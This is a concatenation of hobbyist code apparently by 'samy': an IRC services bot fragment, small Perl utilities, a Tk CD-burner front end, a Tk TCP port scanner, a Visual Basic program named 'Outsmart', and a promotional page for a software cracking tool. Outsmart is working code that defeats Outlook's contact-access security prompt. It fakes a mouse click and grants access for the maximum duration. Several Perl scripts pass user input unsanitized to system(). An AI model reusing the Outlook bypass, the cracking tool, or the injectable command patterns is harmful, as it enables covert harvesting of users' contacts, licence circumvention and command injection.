- }
- else {
- print SOCK "SJOIN ts $1 + :\@$botnick\n" unless $chans{$1};
- &addconf("JOIN:" . lc($1) . ":$2:\n");
- $chans{lc($1)}{$2} = 1;
- }
- next;
- }
- # botjoin command
- elsif ($etc =~ /^:botjoin\s+(\S+)\s+(\S+)/i) {
- print SOCK "SJOIN ts $2 + :\@$1\n";
- $chans{$2} = 1;
- next;
- }
- # botpart command
- elsif ($etc =~ /^:botpart\s+(\S+)\s+(\S+)/i) {
- print SOCK ":$1 PART $2\n";
- delete($chans{$2});
- next;
- }
- # botop command
- elsif ($etc =~ /^:botop\s+(\S+)\s+(\S+)\s+(\S+)/i) {
- if ($chans{$2}) {
- print SOCK ":$1 MODE $2 +o $3\n";
- }
- else {
- print SOCK "SJOIN ts $2 + :\@$1\n:$1 MODE $2 +o $3\n:$1 PART $2\n"
- }
- next
- }
- # botdeop command
- elsif ($etc =~ /^:botdeop\s+(\S+)\s+(\S+)\s+(\S+)/i) {
- if ($chans{$2}) {
- print SOCK ":$1 MODE $2 -o $3\n";
- }
- else {
- print SOCK "SJOIN ts $2 + :\@$1\n:$1 MODE $2 -o $3\n:$1 PART $2\n"
- }
- next
- }
- }
- # oper commands [and above]
- if ($nicks{$nick} >= 1) {
- # rehash command
- if ($etc =~ /^:rehash/i) {
- &rehash;
- print SOCK ":$botnick PRIVMSG $nick :\cbRehashed.\cb\n";
- next;
- }
- # joinz0r command
- elsif ($etc =~ /^:joinz0r\s+(.+)\s*$/i) {
- @chns = split(/\s+/, $1);
- foreach (@chns) {
- print SOCK "SJOIN ts $_ + :\@$botnick\n";
- $chans{$_} = 1;
- }
- next;
- }
- # partz0r command
- elsif ($etc =~ /^:partz0r\s+(.+)\s*$/i) {
- @chns = split(/\s+/, $1);
- foreach (@chns) {
- print SOCK ":$botnick PART $_\n";
- delete($chans{$_});
- }
- next;
- }
- # deopz0r command
- elsif ($etc =~ /^:deopz0r\s+(\S+)\s+(.*)$/i) {
- if ($chans{$1}) {
- @x = split(/\s/, $2);
- $r = @x;
- for (@x) {
- delete $sall{lc($1)}{'@' . lc($_)};
- $sall{lc($1)}{lc($_)} = 1;
- }
- print SOCK ":$botnick MODE $1 " . "-" x $r . "o" x $r . " $2\n";
- }
- else {
- @x = split(/\s/, $2);
- for (@x) {
- delete $sall{lc($1)}{'@' . lc($_)};
- $sall{lc($1)}{lc($_)} = 1;
- }
- $r = @x;
- print SOCK "SJOIN ts $1 + :\@$botnick\n:$botnick MODE $1 " . "-" x $r . "o" x $r . " $2\n:$botnick PART $1\n";
- }
- }
- # opz0r command [for opers and above]
- elsif ($etc =~ /^:opz0r\s+(\S+)\s+(.*)$/i && $nicks{$nick} > 0) {
- if ($chans{$1}) {
- @x = split(/\s/, $2);
- for (@x) {
- delete $sall{lc($1)}{lc($_)};
- $sall{lc($1)}{'@' . lc($_)} = 1;
- }
- $r = @x;
- print SOCK ":$botnick MODE $1 " . "+" x $r . "o" x $r . " $2\n";
- }
- else {
- @x = split(/\s/, $2);
- for (@x) {
- delete $sall{lc($1)}{lc($_)};
- $sall{lc($1)}{'@' . lc($_)} = 1;
- }
- $r = @x;
- print SOCK "SJOIN ts $1 + :\@$botnick\n:$botnick MODE $1 " . "+" x $r . "o" x $r . " $2\n";
- print SOCK ":$botnick PART $1\n";
- }
- next;
- }
- }
- }
- }
- }
- # check the conf for a certain line and check the password
- sub readconf {
- ($match, $pwd) = @_;
- open(FH, "<$conf");
- @lines = <FH>;
- $match =~ s/\*/.*/g;
- foreach (@lines) {
- if (/^$match(.*)$/i) {
- close(FH);
- if (&ckpasswd($pwd, $1)) {
- return 1;
- }
- else {
- return 0;
- }
- }
- }
- close(FH);
- return 0;
- }
- # restart function to restart the program completely, good for restarting on code changes
- sub restart {
- sleep 3;
- system("$^X $0 " . join(' ', @ARGV) . " &");
- die "\n";
- }
- # check the conf for any line
- sub chkline {
- ($line) = @_;
- open(FH, "<$conf");
- @lines = <FH>;
- foreach (@lines) {
- if (/^$line/i) {
- close(FH);
- return 1;
- }
- }
- close(FH);
- return 0;
- }
- # check the conf for a CHAN line
- sub checkconf {
- $chn = $_[0];
- open(FH, "<$conf");
- @lines = <FH>;
- $tm = "CHAN:" . lc($chn) . ":";
- foreach (@lines) {
- if (/^$tm/) {
- close(FH);
- return 1;
- }
- }
- close(FH);
- return 0;
- }
- # check the conf for a CHAN line with a specific nick
- sub checkconfnick {
- ($chn, $nck) = @_;
- $chn = lc($chn);
- $nck = lc($nck);
- open(FH, "<$conf");
- @lines = <FH>;
- $tm = "CHAN:$chn:$nck:";
- foreach (@lines) {
- if (/^$tm/) {
- close(FH);
- return 1;
- }
- }
- close(FH);
- return 0;
- }
- # add an op to the conf file
- sub addop {
- ($nck, $chan) = @_;
- open(FH, "+<$conf");
- @fh = <FH>;
- $nck = lc($nck);
- $chan = lc($chan);
- foreach (@fh) {
- if (/^PASS:$nck:[^:]+:[^:]+:(.*)$/i) {
- $xf = "CHOP:$chan:$nck:$1\n";
- print FH $xf;
- close(FH);
- last;
- }
- }
- &rehash;
- return 0;
- }
- # add an oper
- sub addoper {
- $done = 0;
- $xf = 0;
- ($nck, $id) = @_;
- open(FH, "+<$conf");
- @fh = <FH>;
- $nck = lc($nck);
- foreach (@fh) {
- if (/^OPER:\d+:$nck:/i) {
- $xf++;
- last;
- }
- if (/^PASS:$nck:[^:]+:[^:]+:(.*)$/i) {
- if ($done == 0) {
- $rf = "OPER:$id:$nck:$1\n";
- $done++;
- }
- }
- }
- if (!$xf && $done == 1) {
- print FH $rf;
- }
- close(FH);
- if ($done == 1) {
- return 1;
- }
- elsif ($done > 1) {
- return 2;
- }
- else {
- return 0;
- }
- }
- # check to see if a pass exists for someone
- sub checkpass {
- $there = 0;
- $nck = $_[0];
- =cut
- open(FH, "<$conf");
- while (<FH>) {
- if (/PASS:$nck:/i) {
- close(FH);
- return 1;
- }
- }
- =cut
- if ($passes{$nck}) {
- return 1;
- }
- return 0;
- }
- # add an oper line to the conf
- sub operconf {
- ($nck, $id, $pass) = @_;
- $nck = lc($nck);
- open(FH, ">>$conf");
- $newp = &mkpasswd($pass);
- print FH "OPER:$id:$nck:$newp\n";
- close(FH);
- &rehash;
- }
- # rehash the conf and local data to the program
- sub rehash {
- undef %nicks;
- undef %passes;
- undef %chnln;
- undef %chnlp;
- undef %confz0r;
- open(FH, "<$conf");
- while (<FH>) {
- $confz0r{$_} = 1;
- if (/^JOIN:([^:]+):([^:]*):$/) {
- $join{lc($1)}{$2} = 1;
- next;
- }
- elsif (/^L33T:(.+)$/) {
- $protect{$1} = 1;
- next;
- }
- elsif (/^PASS:([^:]+):\d+:\d+:([^:]+)$/) {
- $passes{$1} = $2;
- next;
- }
- elsif (/^OPER:(\d+):([^:]+):(.*)$/) {
- $nicks{lc($2)} = $1;
- $passes{lc($2)} = $3;
- next;
- }
- elsif (/^CHAN:([^:]+):([^:]+):(.*)$/) {
- $chnlp{lc($1)} = $3;
- $chnln{lc($1)} = $2;
- next;
- }
- }
- close(FH);
- }
- # add a line to the conf
- sub addconf {
- @tmp = @_;
- open(FH, ">>$conf");
- foreach (@tmp) {
- print FH $_;
- }
- close(FH);
- }
- # create an encrypted password
- sub mkpasswd {
- $what = $_[0];
- $salt = chr(65+rand(27)).chr(65+rand(27));
- $salt =~ s/\W/x/g;
- return crypt($what, $salt);
- }
- # check an encrypted password with a non-encrypted one
- sub ckpasswd {
- ($plain, $encrypted) = @_;
- if (!$encrypted) {
- ($plain, $encrypted) = split(/\s+/, $plain, 2);
- }
- return '' unless ($plain && $encrypted);
- if ($encrypted =~ /^\$\d\$(\w\w)\$/) {
- $salt = $1;
- }
- else {
- $salt = substr($encrypted, 0, 2);
- }
- return ($encrypted eq crypt($plain, $salt));
- }
- # modify a user (under construction)
- sub moduser {
- ($user, $id) = @_;
- $user = lc($user);
- open(FH, "<$conf");
- @fh = <FH>;
- foreach (@fh) {
- if (/^PASS:$user:([^:]+):(\d+):(.+)$/) {
- $rf = "PASS:$user:" . lc($1) . ":$id:$3";
- $xf = "PASS:$user:" . lc($1) . ":$2:$3";
- }
- }
- close(FH);
- if (!$rf) {
- return 0;
- }
- else {
- open(FH, ">>$conf");
- while (<FH>) {
- if (/^$xf$/) {
- s/^$xf$/$rf/;
- }
- }
- close(FH);
- }
- }
- # get the status of a user
- sub status {
- $nick = $_[0];
- $nick = $nick;
- open(FH, "<$conf");
- while (<FH>) {
- if (/OPER:(\d+):$nick:/i) {
- if ($1 >= 31337) {
- close(FH);
- return "l33t hax0r";
- }
- elsif ($1 >= 666) {
- close(FH);
- return "hax0r";
- }
- elsif ($1 >= 1) {
- close(FH);
- return "oper";
- }
- else {
- close(FH);
- return "wannabe oper";
- }
- }
- }
- close(FH);
- return "peasant user";
- }
- #!/usr/bin/perl
- # by samy [CommPort5@LucidX.com]
- # This some-what 'greps' all input files you give it with
- # the string to 'grep', and if it sees any #include's in
- # the files (usually in C and header files), it will also
- # 'grep' those for the string, and everything in those,
- # and everything in those, and so on :)
- if (@ARGV < 2) {
- die "usage: $0 [-g (case-insensitive)] <list of C/header files> <'string/regexp to perl grep'>\n";
- }
- $grep = pop(@ARGV);
- if ($ARGV[0] =~ /^-.{1}$/) {
- $arg = shift(@ARGV);
- }
- foreach $file (@ARGV) {
- $check{$file} = 1;
- }
- foreach $file (@ARGV) {
- $bad = 0;
- open(TMP, "<$file") or $bad++;
- if ($bad) {
- print "Unable to open $file: $!\n";
- }
- else {
- while (<TMP>) {
- if ($arg eq "-g") {
- if (/$grep/i) {
- print "$file:$_";
- }
- }
- else {
- if (/$grep/) {
- print "$file:$_";
- }
- }
- if (/include\s*<([^>]+)>/ and !$check{"/usr/include/" . $1}) {
- $incl{"/usr/include/" . $1} = 1;
- $check{"/usr/include/" . $1} = 1;
- }
- }
- close(TMP);
- }
- }
- &dcheck(%incl);
- sub dcheck {
- %temp = @_;
- %new = ();
- foreach $file (keys(%temp)) {
- $check{"/usr/include/" . $file} = 1;
- }
- foreach $file (keys(%temp)) {
- $bad = 0;
- open(TMP, "<$file") or $bad++;
- if (!$bad) {
- while (<TMP>) {
- if (/include\s*<([^>]+)>/ and !$check{"/usr/include/" . $1}) {
- $new{"/usr/include/" . $1} = 1;
- $check{"/usr/include/" . $1} = 1;
- }
- if ($arg eq "-g") {
- if (/$grep/i) {
- print "$file:$_";
- }
- }
- else {
- if (/$grep/) {
- print "$file:$_";
- }
- }
- }
- close(TMP);
- }
- }
- if (%new) {
- &dcheck(%new);
- }
- }
- #!/usr/bin/perl
- # this is for doing stuff with multiple files when the program doesn't support multiple files
- # example:
- # if you have 3 .tar's in a dir, you can't do tar -xvf *.tar
- # you have to do each one, one by one
- # with this, you just do something like: mass 'tar -xvf *.tar' and it will run each one for you
- # or maybe mass 'tar -xvf program-0.?.tar' or whatever...
- # cp5 owns.you
- die "usage: $0 <'program'>\nexample: $0 'tar -xvf *.tar'\n" unless @ARGV == 1;
- @args = split(/\s+/, $ARGV[0]);
- foreach (@args) {
- unless (/\?|\*/ or $dn) {
- $frst .= "$_ ";
- }
- if ($dn) {
- $last .= "$_ ";
- }
- if (/\?|\*/) {
- $dn++;
- if (/^(.*?\/)([^\/]+)$/) {
- opendir (DIR, $1);
- $file = $2;
- }
- else {
- opendir (DIR, "./");
- $file = $_;
- }
- $file =~ s/\?/.{1}/g;
- $file =~ s/\*/.*?/g;
- @fils = grep { /^$file$/ } readdir(DIR);
- }
- }
- foreach (@fils) {
- system("$frst $_ $lst");
- }
- #!/usr/bin/perl
- # -sam k (commport5@lucidx.com)
- # reads the perl program and outputs a module header that you
- # have to add to the .pl to make it into a module
- # e.g.,
- # ./mkmod Inject.pl Packet::Inject 0.01 > Inject.pm ; cat Inject.pl >> Inject.pm ; rm Inject.pl
- die "usage: $0 <file> <module name> <version>\n" unless @ARGV == 3;
- open(TMP, $ARGV[0]) or die "Unable to open $ARGV[0]: $!\n";
- while (<TMP>) {
- if (($f) = $_ =~ /^[^#]*[^#\\]*sub\s+(\S+)/) {
- $funcs .= "$f ";
- }
- }
- $funcs =~ s/\s*$//g;
- $tmp{'@ISA'} = 1;
- $tmp{'@EXPORT'} = 1;
- $tmp{'$VERSION'} = 1;
- ($mod) = $ARGV[1] =~ /^([^:]+)/;
- ($pm = $ARGV[0]) =~ s/\.pl//;
- print "
- # $pm.pm $ARGV[2] (module: $ARGV[1])
- package $ARGV[1];
- require Exporter;
- \@ISA = qw(Exporter);
- \@EXPORT = qw($funcs);
- \$VERSION = '$ARGV[2]';
- ";
- #!/usr/bin/perl
- # by Samy Kamkar [commport5@lucidx.com]
- # requires burncd for burning isos
- # requires mkisofs if you want to burn regular files/dirs onto a cd
- use Tk;
- $mdb = MainWindow->new();
- $mdb->title(" CD-R(W) Burner");
- $mhead = $mdb->Frame(-relief => 'ridge', -borderwidth => 2)->pack(-fill => 'x', -anchor => 'nw', -side => 'top');
- $mright = $mdb->Frame(-relief => 'ridge', -borderwidth => 2)->pack(-fill => 'x', -anchor => 'ne', -side => 'right');
- $mright->Label(-text => 'Media Type')->pack(-fill => 'x', -anchor => 'nw', -side => 'top');
- @typerad = ('Audio [XA]', 'Data', 'Data/Audio', 'No Idea');
- for my $type (0 .. 3) {
- $mright->Radiobutton(-text => "$typerad[$type]", -variable => \$dbtype, anchor => 'w', -relief => 'flat', -value => $type)->pack(-side => 'top');
- }
- $mright->Label(-text => "\n\nDevice")->pack;
- $device = $mright->Entry(-borderwidth => 2, -width => 8)->pack;
- $device->insert('end', "racd1a");
- $mright->Label(-text => "\nSpeed")->pack;
- $speed = $mright->Entry(-borderwidth => 2, -width => 8)->pack;
- #$speed->insert('end', "2");
- $mbot = $mdb->Frame( -relief=>'ridge', -borderwidth => 2)->pack(-fill => 'x', -anchor => 'nw', -side => 'bottom');
- $mbot->Checkbutton(-text => "Eject when done", -variable => \$cstart, anchor => 'e', -relief => 'flat', -command => sub { &eject })->pack(-side => 'top');
- $mbot->Checkbutton(-text => "Preemphasis on audio tracks", -variable => \$asknew, anchor => 'e', -relief => 'flat', -command => sub { &emph })->pack(-side => 'top');
- $mbot->Checkbutton(-text => "Test burn", -variable => \$mkrev, anchor => 'e', -relief => 'flat', -command => sub { &test })->pack(-side => 'top');
- $mbot->Checkbutton(-text => "Quiet at console", -variable => \$mknew, anchor => 'e', -relief => 'flat', -command => sub { &quiet })->pack(-side => 'top');
- for $i (1 .. 5) {
- ($f, $l, $e) = ("mhead_${i}", "mhead_${i}_l", "mhead_${i}_e");
- ${$f} = $mdb->Frame();
- ${$f}->pack(-side => 'top', -pady => '2', -anchor => 'e');
- ${$l} = ${$f}->Label(-text => "ISO $i", -anchor => 'e');
- ${$e} = ${$f}->Entry(-width => '20', -relief => 'sunken');
- ${$e}->insert('0', $dbfill[$i]);
- ${$e}->pack(-side => 'right');
- ${$l}->pack(-side => 'right');
- }
- for $i (6 .. 10) {
- $r = ($i - 5);
- ($f, $l, $e) = ("mhead_${i}", "mhead_${i}_l", "mhead_${i}_e");
- ${$f} = $mdb->Frame();
- ${$f}->pack(-side => 'top', -pady => '2', -anchor => 'e');
- ${$l} = ${$f}->Label(-text => "File/Dir $r", -anchor => 'e');
- ${$e} = ${$f}->Entry(-width => '20', -relief => 'sunken');
- ${$e}->insert('0', $dbfill[$i]);
- ${$e}->pack(-side => 'right');
- ${$l}->pack(-side => 'right');
- }
- $btnok = $mhead->Button(-text => 'Burn');
- $btnok->configure(-command => \&write);
- $btnok->pack(-side => 'left', -padx => '2');
- $btndisc = $mhead->Button(-text => 'Blanken');
- $btndisc->pack(-side => 'left', -padx => '2');
- $btndisc->configure(-command => \&blank);
- $btnconnect = $mhead->Button(-text => 'Eject');
- $btnconnect->pack(-side => 'left', -padx => '2');
- $btnconnect->configure(-command => \&command);
- $btnsave = $mhead->Button(-text => 'Information');
- $btnsave->configure(-command => \&info);
- $btnsave->pack(-side => 'left', -padx => '2');
- $btncancel = $mhead->Button(-text => 'Exit', -command => [$mdb,'destroy']);
- $btncancel->pack(-side => 'left', -padx => '2');
- MainLoop;
- sub command {
- $dev = get $device;
- print "Executing: burncd -f /dev/$dev -e\n";
- system("burncd -f /dev/$dev -e");
- }
- sub blank {
- my $isos;
- my $files;
- $args = "burncd";
- $spd = get $speed;
- $dev = get $device;
- $args .= " -f /dev/$dev";
- if ($spd) {
- $args .= " -s $spd";
- }
- if ($eject %2 != 0) {
- $args .= " -e";
- }
- if ($quiet %2 != 0) {
- $args .= " -q";
- }
- if ($test %2 != 0) {
- $args .= " -t";
- }
- $args .= " blank";
- print "Executing: $args\n";
- system($args);
- print "Finished.\n\n";
- }
- sub write {
- $args = "burncd";
- for (1 .. 5) {
- $mhead = "mhead_${_}_e";
- $file = get ${$mhead};
- if ($file) {
- $files .= " $file";
- }
- }
- for (6 .. 10) {
- $mhead = "mhead_${_}_e";
- $file = get ${$mhead};
- if ($file) {
- $isos .= "$file ";
- }
- }
- $rand = rand(1000000);
- print "Executing: mkisofs $isos> /tmp/.burn.$rand";
- system("mkisofs $isos> /tmp/.burn.$rand");
- $files .= " /tmp/.burn.$rand";
- $spd = get $speed;
- $dev = get $device;
- $args .= " -f /dev/$dev";
- if ($spd) {
- $args .= " -s $spd";
- }
- if ($eject %2 != 0) {
- $args .= " -e";
- }
- if ($test %2 != 0) {
- $args .= " -t";
- }
- if ($quiet %2 != 0) {
- $args .= " -q";
- }
- if ($emph %2 != 0) {
- $args .= " -p";
- }
- if ($dbtype) {
- $args .= " data";
- }
- else {
- $args .= " audio";
- }
- $args .= $files;
- $args .= " fixate";
- print "Executing: $args\n";
- system($args);
- print "Finished.\n\n";
- }
- sub info {
- my $top2 = $mdb->Toplevel;
- $top2->Label(-text => "\n Perl/Tk CD Burner [burncd front-end] \n by Samy Kamkar\n")->pack;
- }
- sub quiet {
- $quiet++;
- }
- sub eject {
- $eject++;
- }
- sub emph {
- $emph++;
- }
- sub test {
- $test++;
- }
- #!/usr/bin/perl
- use strict;
- use Tk;
- use IO::Socket;
- my ($sfile, $nfrm, $entry, $file, $but, $fromport, $toport, $neww, $nwww, $hlpm, $flmn, $menu, $save, $mw, $mid, $win, $prt, $l);
- $save = "0";
- $mw = MainWindow->new();
- $mw->configure(-background => 'black');
- $mw->title(" Perl/Tk Port Scanner");
- $menu = $mw->Frame(-relief => 'groove', -border => 3, -background => 'grey')->pack('-side' => 'top', -fill => 'x');
- $flmn = $menu->Menubutton(-text => 'File', -tearoff => 0, -background => 'grey', -activebackground => 'white', -foreground => 'black')->pack(-side => 'left');
- $hlpm = $menu->Menubutton(-text => 'Help', -tearoff => 0, -background => 'grey', -activebackground => 'white', -foreground => 'black')->pack(-side => 'right');
- $neww = $mw->Frame(-background => 'black')->pack(-side => 'top', -fill => 'x');
- $nwww = $neww->Frame(-background => 'black')->pack(-side => 'left', pady => 9, padx => 8);
- $hlpm->command(-label => 'Info', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => sub{info()});
- #$hlpm->command(-label => 'Help', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => sub{help()});
- $hlpm->separator();
- #$hlpm->command(-label => 'Ports', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => sub{ports()});
- #$hlpm->command(-label => 'Upgrade', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => sub{upgrade()});
- $flmn->command(-label => 'Scan', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => sub{scan($entry, $fromport, $toport, $file)});
- $flmn->command(-label => 'Info', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => sub{info()});
- $flmn->separator();
- $flmn->command(-label => 'Exit', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => [$mw,'destroy']);
- $nwww->Label(-background => 'black', -relief => 'sunken', -foreground => 'green', -text => "Hostname/IP:")->pack;
- $nwww->Label(-background => 'black', -relief => 'sunken', -foreground => 'green', -text => "Starting port:")->pack;
- $nwww->Label(-background => 'black', -relief => 'sunken', -foreground => 'green', -text => "End port:")->pack;
- $nwww->Label(-background => 'black', -relief => 'sunken', -foreground => 'green', -text => "File to write to:")->pack;
- $nwww->Label(-background => 'black', -relief => 'sunken', -foreground => 'green', -text => "Write to file?")->pack;
- $nfrm = $neww->Frame(-background => 'black')->pack(-side => 'left', -pady => 2, -padx => 15);
- $entry = $nfrm->Entry(-background => 'white', -foreground => 'black', -borderwidth => 2, -relief => 'sunken', -width => 30)->pack;
- $entry->insert('end', "localhost");
- $fromport = $nfrm->Entry(-background => 'white', -foreground => 'black', -borderwidth => 2, -relief => 'sunken', -width => 6)->pack;
- $fromport->insert('end', "1");
- $toport = $nfrm->Entry(-background => 'white', -foreground => 'black', -borderwidth => 2, -relief => 'sunken', -width => 6)->pack;
- $toport->insert('end', "1024");
- $file = $nfrm->Entry(-background => 'grey', -foreground => 'grey', -borderwidth => 2, -width => 30)->pack;
- $nfrm->Checkbutton(-background => 'white', -command => sub{save()})->pack;
- $but = $mw->Frame(-borderwidth => 0, -background => 'black', -relief => 'groove')->pack(-side => 'top', -fill => 'x');
- $but->Button(-background => 'black', -foreground => 'white', -text => 'Info', -command => sub{info()})->pack(-side => 'left');
- $but->Button(-background => 'black', -foreground => 'white', -text => 'Scan', -command => sub{scan($entry, $fromport, $toport, $file)})->pack(-side => 'left');
- #$prt = $mw->Label(-text => "Waiting for acknowledgement...", -foreground => 'green', -background => 'black', -pady => 4)->pack();
- $but->Button(-background => 'black', -foreground => 'white', -text => 'Exit', -command => [$mw,'destroy'])->pack(-side => 'right');
- $mid = $mw->Frame(-background => 'black', -foreground => 'green')->pack(-side => 'top', -fill => 'y', -expand => 'y');
- $win = $mid->Frame(-background => 'black', -foreground => 'green')->pack(-side => 'left', pady => 2, padx => 2);
- #$mw->Photo('imggif', -file => "lxban.gif");
- #$l = $mw->Label('-image' => 'imggif', -border => 0)->pack;
- MainLoop;
- sub scan {
- my ($entry, $fromport, $toport, $file, $scan, $true, $con, $top1);
- ($entry, $fromport, $toport, $file) = @_;
- if ($save %2 != 0) {
- $sfile = get $file;
- }
- $sentry = get $entry;
- $sfromport = get $fromport;
- $stoport = get $toport;
- $scan;
- do {
- $true = "0";
- $con = IO::Socket::INET->new(
- Proto => "tcp",
- PeerAddr => $sentry,
- PeerPort => $sfromport) or $true++;
- if ($true == "0") {
- $scan .= "Port $sfromport open\n";
- if ($save == 1) {
- if ($sfile eq "") {
- $sfile = "/tmp/tkscan.log";
- }
- open(FILE, ">>$sfile");
- print FILE "Port $sfromport open on $sentry\n";
- }
- }
- $sfromport++;
- }
- while ($sfromport <= $stoport);
- if ($save %2 != 0) {
- close(FILE);
- }
- $top1 = $mw->Toplevel;
- $top1->title(" Ports");
- $top1->Label(-text => "Ports open on $sentry\n\n$scan")->pack;
- }
- sub info {
- my $top2 = $mw->Toplevel;
- $top2->Label(-text => "Perl/Tk port scanner\nwritten by samy\n\nhttp://www.LucidX.com\n")->pack;
- }
- sub save {
- $save++;
- if ($save %2 != 0) {
- $file->configure(-background => 'white', -foreground => 'black', -relief => 'sunken');
- $file->delete(0, 'end');
- $file->insert('end', "/tmp/tkscan.log");
- }
- else {
- $file->configure(-background => 'grey', -foreground => 'grey');
- $file->delete(0, 'end');
- }
- }
- ' Outsmart -- Local Outlook Security Evasion -- samy@lucidx.com
- '
- ' Recent versions of Outlook, as well as a released patch,
- ' make Outlook prompt the user whenever a remote appliction
- ' tries to access specific contact information in the Outlook
- ' Contact database. The user can then decide to allow or not
- ' allow the application to get that access.
- '
- ' Microsoft took extra care in making sure that a remote
- ' application could not just get the handle to the popup,
- ' focus it, and click 'Yes' for the user. In fact, if you try
- ' that, you will SEE the button getting clicked, but nothing
- ' happening. I discovered that only when it receives focus
- ' from the mouse does it allow the buttons to be controlled.
- '
- ' Yes, even BM_CLICK's, WM_LBUTTONDOWN/WM_LBUTTONUP,
- ' SetActiveWindow, SetForegroundWindow, etc will not do the job
- ' until focus from a mouseevent is executed.
- '
- ' I did this in VB to be used within an actual VBA Outlook
- ' plugin, if you really wanted to. I'm not a VB programmer
- ' and this is my first VB application so please don't h8.
- '
- ' Thanks to BasharTeg for pointing me in the right direction
- ' on functions to use to get access to certain objects.
- '
- ' Enjoy.
- '
- ' -samy, 10/22/04
- Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
- (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
- Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
- (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _
- ByVal lParam As Long) As Long
- Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" _
- (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, _
- ByVal lpsz2 As String) As Long
- Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
- Private Declare Function GetCursorPos Lib "user32" _
- (lpPoint As POINTAPI) As Long
- Private Declare Function SetCursorPos Lib "user32" _
- (ByVal X As Long, ByVal Y As Long) As Long
- Private Declare Function GetWindowRect Lib "user32" _
- (ByVal hWnd As Long, lpRect As RECT) As Long
- Private Declare Sub mouse_event Lib "user32" _
- (ByVal dwFlags As Long, ByVal dx As Long, ByVal dy _
- As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)
- Private Type RECT
- Left As Long
- Top As Long
- Right As Long
- Bottom As Long
- End Type
- Private Type POINTAPI
- X As Long
- Y As Long
- End Type
- Const WM_ACTIVATE = &H6
- Const MA_ACTIVATE = 1
- Const BM_CLICK = &HF5
- Const BM_SETCHECK = &HF1
- Const MOUSEEVENTF_LEFTDOWN = &H2
- Const MOUSEEVENTF_LEFTUP = &H4
- Const CB_GETCOUNT = &H146
- Const CB_SETCURSEL = &H14E
- ' Mutex Stuff
- Private Declare Function CreateMutex Lib "kernel32" Alias "CreateMutexA" (lpMutexAttributes As Any, ByVal bInitialOwner As Long, ByVal lpName As String) As Long
- Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
- Private Declare Function ReleaseMutex Lib "kernel32" (ByVal hMutex As Long) As Long
- Const ERROR_ALREADY_EXISTS = 183&
- Dim mutex As Long
- Private Sub Form_Load()
- ' Setup a mutex
- SetupMutex
- ' Kill any security popups ;) within the next <Seconds>
- ' This function actually makes any security popups that are active
- ' disabled for 10 minutes. I run this app right before I need
- ' to access any contact database email info. I do not do
- ' this from the program itself since VB doesn't have real
- ' threading (Timers will not work when a call waits which is
- ' what happens upon Outlook's security window popup).
- KillSecurity 3
- ' Exit and close mutex
- Unload Me
- End
- End Sub
- ' Set the security popup to allow us to access contact info
- ' for the next 10 minutes. This only works if the poup
- ' is actually up.
- Sub KillSecurity(Seconds As Integer)
- Dim hWndParent&, hWndChild&, hWndCheck&, hWndCombo&
- Dim i As Integer
- Dim comboItems As Integer
- Dim mousepos As POINTAPI
- Dim lpRect As RECT
- i = 0
- Do
- hWndParent = 0
- i = i + 1
- ' Get highest parent window handle
- hWndOutlook = FindWindow(vbNullString, "Microsoft Outlook")
- ' Get parent window handle
- hWndParent = FindWindow("#32770", "Microsoft Office Outlook")
- If hWndParent = 0 Then
- hWndParent = FindWindow("#32770", "Microsoft Outlook")
- End If
- ' If we found a handle
- If hWndParent Then
- hWndChild = 0
- hWndCombo = 0
- hWndCheck = 0
- ' Find the 'Yes' button and other things in the security box
- hWndChild = FindWindowEx(hWndParent, 0, "Button", "Yes")
- If hWndChild = 0 Then
- hWndChild = FindWindowEx(hWndParent, 0, "Button", "&Yes")
- End If
- hWndCombo = FindWindowEx(hWndParent, 0, "ComboBox", "")
- hWndCheck = FindWindowEx(hWndParent, 0, "Button", "&Allow access for")
- ' If we found the security dialog box, let's own it
- If hWndChild And hWndCheck And hWndCombo Then
- ' Focus Outlook -- Outlook's security patch attempts to
- ' stop intruders just clicking the 'yes' which is why
- ' no one has been able to get around this yet. It only
- ' works if the window is given manual focus from the
- ' mouse, and not a system call like SetForegroundWindow.
- ' I rule.
- Call GetCursorPos(mousepos)
- Call GetWindowRect(hWndParent, lpRect)
- Call SetCursorPos(lpRect.Left + 10, lpRect.Top + 10)
- Call mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
- Call Sleep(0)
- Call mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
- Call SetCursorPos(mousepos.X, mousepos.Y)
- ' Check the 'Allow access for' checkbox
- Call SendMessage(hWndCheck, BM_SETCHECK, 1, 0)
- ' Get number of drop down items
- comboItems = SendMessage(hWndCombo, CB_GETCOUNT, 0, 0)
- ' Set minutes to number of drop down items (0 based)
- Call SendMessage(hWndCombo, CB_SETCURSEL, comboItems - 1, 0)
- ' Click 'Yes'
- Call SendMessage(hWndChild, WM_ACTIVATE, MA_ACTIVATE, 0)
- Call SendMessage(hWndChild, BM_CLICK, 0, 0)
- End If
- End If
- Sleep 50
- Loop While i < Seconds * 20
- End Sub
- ' On unload
- Private Sub Form_Unload(Cancel As Integer)
- ReleaseMutex mutex
- CloseHandle mutex
- End Sub
- ' Create mutex
- Sub SetupMutex()
- ' set a mutex up
- mutex = CreateMutex(ByVal 0&, 1, "Outsmartmutex")
- If Err.LastDllError = ERROR_ALREADY_EXISTS Then
- ' Clean up
- ReleaseMutex mutex
- CloseHandle mutex
- ' More than one instance detected
- Unload Me
- End
- End If
- End Sub
- Cracker-Patcher 5
- Welcome to crack.LucidX.com
- Here, you can find Cracker-Patcher 5 (C-P5) and .cp5 files for it (by SeaPea5).
- 5.01-RELEASE out! [6/19/2002] -- added registry entry creation and replacement!
- Current version: 5.01 .. Download (.exe)
- Update file (you can ignore this): here
- Template .cp5 file: hexedit210.cp5 (hex edit 2.10 patch)
